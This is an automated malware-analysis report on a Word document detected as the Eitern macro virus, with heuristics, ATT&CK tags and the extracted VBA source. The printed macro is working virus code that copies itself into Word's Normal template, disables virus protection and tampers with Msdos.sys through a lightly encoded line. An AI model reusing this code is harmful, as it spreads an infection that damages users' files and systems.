MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a strong indicator of malicious intent. The macro attempts to write its own code to 'C:\Eitern.inf' and then likely execute it. The ClamAV detection of 'Doc.Trojan.Eitern-1' further supports the malicious classification. The macro's obfuscation and self-modification suggest a downloader or dropper functionality.
Heuristics 3
-
ClamAV: Doc.Trojan.Eitern-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Eitern-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4872 bytes |
SHA-256: fab1f3df9a7c28c3bebd24daebe550646d320459e8da9d26066fc65ddd28e54a |
|||
|
Detection
ClamAV:
Doc.Trojan.Eitern-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Open "C:\Eitern.inf" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1 I = (MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(8, 1)) For X = 2 To Len(I): B$ = Asc(Mid(I, X, 1)) - 1: C$ = C$ & Chr(B$): Next X: A = C$ MacroContainer.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 1, "Private Sub Document_Close()" MacroContainer.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine 8, A MacroContainer.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 2, 6 'Po!Fssps!Sftvnf!Ofyu;!Pqujpot/DpogjsnDpowfstjpot!>!)1!.!1*;!Pqujpot/TbwfOpsnbmQspnqu!>!)2!.!2*;!Pqujpot/WjsvtQspufdujpo!>!)3!.!3*;!DpnnboeCbst)#Uppmt#*/Dpouspmt)#Nbdsp#*/Efmfuf Jg!Ebz)2*!Uifo;!TfuBuus!#D;]Ntept/tzt#-!wcOpsnbm;!Tztufn/QsjwbufQspgjmfTusjoh)#D;]Ntept/tzt#-!#Pqujpot#-!#CppuHVJ#*!>!#1#;!TfuBuus!#D;]Ntept/tzt#-!wcTztufn!,!wcIjeefo!,!wcSfbePomz OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/EfmfufMjoft!2-!OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/DpvouPgMjoft;!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/EfmfufMjoft!2-!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/DpvouPgMjoft OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/BeeGspnGjmf!)#D;]Fjufso/jog#*;!BdujwfEpdvnfou/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/BeeGspnGjmf!)#D;]Fjufso/jog#*;!BdujwfEpdvnfou/TbwfBt!GjmfObnf!>!BdujwfEpdvnfou/GvmmObnf End Sub ' Processing file: /opt/analyzer/scan_staging/23d79a50e4854923aa7124ab16b8b830.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 3205 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' Line #1: ' LitStr 0x000D "C:\Eitern.inf" ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Output) ' BoS 0x0000 ' LitDI2 0x0001 ' Sharp ' PrintChan ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld MacroContainer ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd CountOfLines ' LitDI2 0x0001 ' Ld MacroContainer ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' PrintItemNL ' BoS 0x0000 ' LitDI2 0x0001 ' Sharp ' Close 0x0001 ' Line #2: ' LitDI2 0x0008 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld MacroContainer ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' Paren ' St I ' Line #3: ' StartForVariable ' Ld X ' EndForVariable ' LitDI2 0x0002 ' Ld I ' FnLen ' For ' BoS 0x0000 ' Ld I ' Ld X ' LitDI2 0x0001 ' ArgsLd Mid$ 0x0003 ' ArgsLd Asc 0x0001 ' LitDI2 0x0001 ' Sub ' St B$ ' BoS 0x0000 ' Ld C$ ' Ld B$ ' ArgsLd Chr 0x0001 ' Concat ' St C$ ' BoS 0x0000 ' StartForVariable ' Ld X ' EndForVariable ' NextVar ' BoS 0x0000 ' Ld C$ ' St A ' Line #4: ' LitDI2 0x0001 ' LitStr 0x001C "Private Sub Document_Close()" ' LitDI2 0x0001 ' Ld MacroContainer ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemCall ReplaceLine 0x0002 ' Line #5: ' LitDI2 0x0008 ' Ld A ' LitDI2 0x0001 ' Ld MacroContainer ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemCall ReplaceLine 0x0002 ' Line #6: ' LitDI2 0x0002 ' LitDI2 0x0006 ' LitDI2 0x0001 ' Ld MacroContainer ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemCall DeleteLines 0x0002 ' Line #7: ' QuoteRem 0x0000 0x036D "Po!Fssps!Sftvnf!Ofyu;!Pqujpot/DpogjsnDpowfstjpot!>!)1!.!1*;!Pqujpot/TbwfOpsnbmQspnqu!>!)2!.!2*;!Pqujpot/WjsvtQspufdujpo!>!)3!.!3*;!D ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.